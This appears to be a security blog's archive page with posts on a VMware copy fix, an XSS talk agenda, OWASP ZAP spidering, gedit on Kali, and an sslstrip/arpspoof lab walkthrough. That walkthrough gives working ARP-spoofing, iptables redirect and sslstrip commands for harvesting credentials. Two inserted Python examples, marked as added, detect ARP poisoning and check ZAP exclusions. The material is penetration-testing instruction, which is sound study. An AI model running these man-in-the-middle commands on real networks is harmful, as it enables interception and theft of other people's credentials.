Computers, Programming, Technology, Music, Literature

Archive for the ‘kali’ Category

Fixing VMWare Player Cannot write to local file Cancelling the file copy operation


 

 

PROBLEM: When copying files from VMWare player to the host (Windows host in this case), you get “Cannot write to local file”.

SOLUTION: Make space. Clear temp and %temp% directories, on your operating system drive.

 

I was trying to copy 5 GB of files from my VMWare player guest OS Kali Linux to my Windows Host. VMWare player displays Copying file “part2.rar” from virtual machine and exits with “Cannot write to local file. Cancelling the file copy operation.”.

 


This VMware knowledge base article hints at disabling tmpfs on Linux operating systems: https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056353

I looked at the temp and %temp% Windows directories and discovered the below temp location, where VMWare Player copies the files from the VM guest, and from there it copies them to the destination directory in the host OS.


My operating system drive C: was full, and I had to clear the temp directories and free up some space to do the 5 GB copy operation from the VMWare Player guest Kali Linux to the Windows host.


Written by gmaran23

March 3, 2017 at 6:30 pm

Devouring Security: Cross Site Scripting [XSS]


 

 

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

 

 

 

 

Agenda in <ul><li>

 

· Risk, Stories & the news
· XSS Anatomy
· Untrusted Data Sources – Well, Where did that come from?
· Shouldn’t it be called CSS instead?
· Types of XSS
    Type 0 [DOM based]
    Type 1 [Reflected or Non-persistent XSS]
    Type 2 [Persistent or Stored XSS]
· Live Demo: XSS 101 with alert(‘hello XSS world’)
· Live Demo: Cookie Hijacking and Privilege Escalation
    Face/Off with John Travolta and Nicolas Cage
· Live Demo: Let’s deploy some Key loggers, huh?
· Mitigations
    Input Sanitization
    Popular Libraries for .Net, Java, php
        § Demo: Input sanitization
    Whitelists (vs. Blacklists)
    Output Encoding
        § Contextual
        § Demo: Output Encoding
    Browser Protections & bypasses
    Framework Protections & bypasses
    Content Security Policy (CSP) in brief
· Secure Code reviews: Spot an XSS, How?
· Tools: Do we have an option?
· XSS Buzz and how to Fuzz
· Renowned Cheat sheets
· Further reading & References

 

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication


 

 

 

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, if required)
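
A check for step 3, as an added example that is not part of the original post or of ZAP itself: it tests candidate exclusion regexes against URLs seen while browsing and reports any session-ending URL the spider would still request. It assumes ZAP treats a URL as excluded only when a regex matches the whole URL; the localhost application, its URLs and the logout heuristic are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Heuristic for "this request ends the session" (assumption, tune per app).
LOGOUT_HINT = re.compile(r"log[-_ ]?(out|off)|sign[-_ ]?out", re.IGNORECASE)

def is_excluded(url, exclude_regexes):
    """Assumed ZAP semantics: excluded only if a regex matches the full URL."""
    return any(re.fullmatch(rx, url) for rx in exclude_regexes)

def uncovered_logout_urls(urls, exclude_regexes):
    """Return session-ending URLs that no exclusion regex covers."""
    risky = []
    for url in urls:
        parts = urlsplit(url)
        target = parts.path + "?" + parts.query
        if LOGOUT_HINT.search(target) and not is_excluded(url, exclude_regexes):
            risky.append(url)
    return risky

# Constructed sample: URLs seen while browsing a hypothetical local test app.
SEEN = [
    "http://localhost:8080/Products.aspx",
    "http://localhost:8080/Account/LogOff.aspx",
    "http://localhost:8080/Account/LogOff.aspx?ReturnUrl=%2f",
    "http://localhost:8080/Account/Login.aspx",
]

# Misses the variant with a query string, so the spider can still log itself out.
TOO_NARROW = [r"http://localhost:8080/Account/LogOff\.aspx"]
# The trailing .* covers any query string appended to the log off URL.
COVERS_ALL = [r"http://localhost:8080/Account/LogOff\.aspx.*"]

if __name__ == "__main__":
    print("too narrow ->", uncovered_logout_urls(SEEN, TOO_NARROW))
    print("covers all ->", uncovered_logout_urls(SEEN, COVERS_ALL))
```
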

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23


 

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to Vimeo. Thanks to Simon Bennetts for feedback and suggestions.

 

 

 

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting


 

 

 

You may think you are connecting to a website over SSL, but did you forget to check for https in the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim – Windows 7 – 192.168.100.11

Attacker – Kali Linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Set up iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip
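
The defender's view of the ARP spoofing step above, as an added example that is not part of the original post: it parses the `arp -a` output of the Windows machine and flags a gateway MAC that differs from a known-good baseline or is shared with another host. The sample ARP cache, both MAC addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# One data row of Windows `arp -a` output: IP, dash-separated MAC, entry type.
ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+\w+",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} for the unicast entries in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # interface banner, column header, blank line
        ip, mac = m.group(1), m.group(2).lower()
        if int(mac[:2], 16) & 1:
            continue  # broadcast/multicast MAC, never a real host
        table[ip] = mac
    return table

def find_arp_anomalies(text, gateway_ip, baseline_gateway_mac=None):
    """Flag a changed gateway MAC and a gateway MAC shared with another host."""
    table = parse_arp_table(text)
    findings = []
    gw_mac = table.get(gateway_ip)
    if baseline_gateway_mac and gw_mac:
        if gw_mac != baseline_gateway_mac.lower().replace(":", "-"):
            findings.append(("gateway-mac-changed", gateway_ip, gw_mac))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            findings.append(("gateway-mac-shared", mac, sorted(ips)))
    return findings

# Constructed sample: the victim's ARP cache while it is being poisoned.
POISONED = """\
Interface: 192.168.100.11 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         00-0c-29-3e-5a-7f     dynamic
  192.168.100.215       00-0c-29-3e-5a-7f     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    # Baseline gateway MAC is a constructed value recorded before the attack.
    for finding in find_arp_anomalies(POISONED, "192.168.100.1", "00-50-56-c0-00-08"):
        print(finding)
```
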

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Installing gedit on kali linux


 

Yeah, it’s really a bummer when you try to edit a file with your (our) favorite text editor, gedit, and you get “command not found”. You may be better off using gvim or leafpad, but when it comes to breaking the habit of using gedit, you may well decide to install gedit by hook or by crook. Just as in BackTrack, off you go and try

apt-get install gedit

 

You get “Unable to locate package gedit”.

You may be wondering if your sources.list should be updated. That is the answer. Update the /etc/apt/sources.list first based on your need with the list of repositories from here. [Or directly try apt-get update from the terminal and then install gedit with apt-get install gedit]

Or for a minimum configuration of repository list, in the terminal run

leafpad /etc/apt/sources.list

Replace the contents of sources.list with the lines below (or make sure they already match):

deb http://http.kali.org/kali kali main contrib non-free 
deb http://security.kali.org/kali-security kali/updates main contrib non-free 
deb cdrom:[Debian GNU/Linux 7.0 Kali - Official Snapshot i386 LIVE/INSTALL Binary 20130905327-07:57]/ kali contrib main non-free 



Save the changes to the sources.list and run apt-get update to update the package repositories.

apt-get update 

 

That’s it. Once the apt-get repository is updated, you can run

apt-get install gedit

and then

gedit /etc/hosts

or

leafpad /etc/hosts

Written by gmaran23

January 2, 2014 at 3:52 pm

Posted in kali
